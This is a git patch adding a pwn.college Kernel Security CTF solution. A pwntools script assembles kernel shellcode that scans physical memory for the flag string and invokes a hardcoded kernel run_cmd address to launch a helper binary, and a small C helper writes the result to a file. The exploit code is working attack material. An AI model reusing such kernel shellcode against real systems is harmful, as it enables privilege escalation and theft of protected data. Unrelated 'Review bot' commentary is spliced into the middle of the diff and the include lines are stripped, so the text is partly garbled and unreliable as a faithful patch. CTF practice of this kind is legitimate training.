From 5537ec2174d2452450149657e20fa49c1cea0719 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Thu, 3 Oct 2024 18:54:15 +0800
Subject: [PATCH] Added Level 12.0 ~ 12.1 of KernelSecurity in PwnCollege

---
.../KernelSecurity/Level12.0/shellcode.py | 79 +++++++++++++++++++
PwnCollege/KernelSecurity/Level12.0/write.c | 17 ++++
2 files changed, 96 insertions(+)
create mode 100644 PwnCollege/KernelSecurity/Level12.0/shellcode.py
create mode 100644 PwnCollege/KernelSecurity/Level12.0/write.c

diff --git a/PwnCollege/KernelSecurity/Level12.0/shellcode.py b/PwnCollege/KernelSecurity/Level12.0/shellcode.py
new file mode 100644
index 0000000..9f0aeb8
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level12.0/shellcode.py
@@ -0,0 +1,79 @@
+import sys
+sys.path.append("..")
+
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+kernel_assembly = f"""
+.equ page_offset_base_min, 0xffff888000000000
+.equ page_offset_base_max, 0xffff888000000000 + 2029520 * 1024
+
+movabs rbx, page_offset_base_min
+
+loop_start:
+mov rdx, page_offset_base_max
+cmp rbx, rdx
+ja loop_end
+lea rdi, [rip + flag_startwith_string]
+lea rsi, [rbx + 0x40]
+call str_startwith
+test rax, rax
+jz loop_next
+lea rdi, [rbx + 0x40]
+call send_message
+loop_next:
+add rbx, 0x1000
+jmp loop_start
+loop_end:
+ret
+int 3
+
+str_startwith:
+ /* const char * comparee in `rdi`, end with 0x00; const char * comparer in `rsi` */
+ /* Clobber: rax, rdi, rsi, rcx */
+ push rdi
+ {shellcraft.amd64.strlen('rdi', 'rcx')}
+ pop rdi
+ cld
+ repe cmpsb
+ jz str_startwith_stop
+ xor rax, rax
+ ret
+str_startwith_stop:
+ mov rax, 1
+ ret
+ int 3
+
+send_message:
+ /* const char * message in `rdi` */
+ /* Clobber: all volatile registers */
+ lea rsi, [rip + run_cmd_buffer]
+ {shellcraft.amd64.strcpy('rsi', 'rdi')}
+ lea rdi, [rip + run_cmd_arg]
+ movabs rsi, 0xffffffff81089b30 /* run_cmd */
+ call rsi
+ ret
+ int 3
+
+flag_startwith_string:
+ .ascii "pwn.college"
+ .byte 0x7B, 0x00
+run_cmd_arg:
+ .ascii "/home/hacker/KernelSecurity/Level12.0/write "
+run_cmd_buffer:
+ .byte 0x00
+""".strip()
+
+kernel_machine_code = dump_machine_code(kernel_assembly)
+
+user_assembly = f"""
+{shellcraft.amd64.pushstr(kernel_machine_code, append_null=False)}
+{shellcraft.amd64.linux.write(3, "rsp", len(kernel_machine_code))}
+""".strip()
+
+user_machine_code = dump_machine_code(user_assembly)
+
+with open('shellcode.bin', 'wb') as f:
+ f.write(user_machine_code)
+ f.write(b'\xcc' * (0x1000 - len(user_machine_code)))
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level12.0/write.c b/PwnCollege/KernelSecurity/Level12.0/write.c
new file mode 100644
index 0000000..49289e4
--- /dev/null
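Review bot: `send_message` performs an unbounded `strcpy` of whatever sits at `[rbx + 0x40]` into `run_cmd_buffer`, which is a single `.byte 0x00` at the very end of the blob, so any candidate longer than one byte writes past the shellcode the kernel was handed; the user side pads `shellcode.bin` to 0x1000 with 0xcc, but only `len(kernel_machine_code)` bytes are sent through `write(3, ...)`, and how much room the receiving module actually allocates for them is not visible here. Reserve space in the blob and cap the copy, e.g. `run_cmd_buffer: .space 0x100, 0x00` together with a length-limited copy (`rep movsb` with `rcx` clamped to 0xff), since a page that happens to hold the prefix followed by a long run of non-zero bytes would otherwise corrupt whatever follows the buffer in kernel memory. Separately, `cmp rbx, rdx` / `ja loop_end` still processes `rbx == page_offset_base_max`, reading 0x40 bytes past the declared upper bound; `jae loop_end` makes the limit exclusive. The scan also assumes the direct map is fully backed between those two `.equ` constants and that `run_cmd` lives at 0xffffffff81089b30 (no KASLR), which presumably holds for the challenge VM but deserves a one-line comment next to the constants.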
+++ b/PwnCollege/KernelSecurity/Level12.0/write.c
@@ -0,0 +1,17 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char* argv[]) {
+ int fd = open("/home/hacker/KernelSecurity/Level12.0/output.txt", O_WRONLY | O_APPEND | O_CREAT, 0644);
+ for (int i = 1; i < argc; i++) {
+ write(fd, argv[i], strlen(argv[i]));
+ write(fd, "\n", 1);
+ }
+ close(fd);
+ return 0;
+}
\ No newline at end of file
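Review bot: `open()`'s result is never checked in `main`, so when the path cannot be opened (missing directory, permissions) `fd` is -1, every `write` silently fails and the program still returns 0 — the flag the kernel payload hands over in argv is then lost without a trace. Add `if (fd < 0) { perror("open"); return 1; }` directly after the `open` call, and treat a short or failed `write` the same way rather than ignoring its return value. Since this helper is launched from the kernel via `run_cmd`, it presumably runs as root; opening a path under the user's home with `O_CREAT` while following symlinks lets whoever controls that directory redirect a root-owned append, so `O_NOFOLLOW` (and `O_EXCL` if the file is meant to be fresh each run) is the safer flag set. The seven `#include` lines have lost their header names in this rendering; the original presumably names at least `<fcntl.h>`, `<unistd.h>` and `<string.h>` for `open`, `write`/`close` and `strlen`.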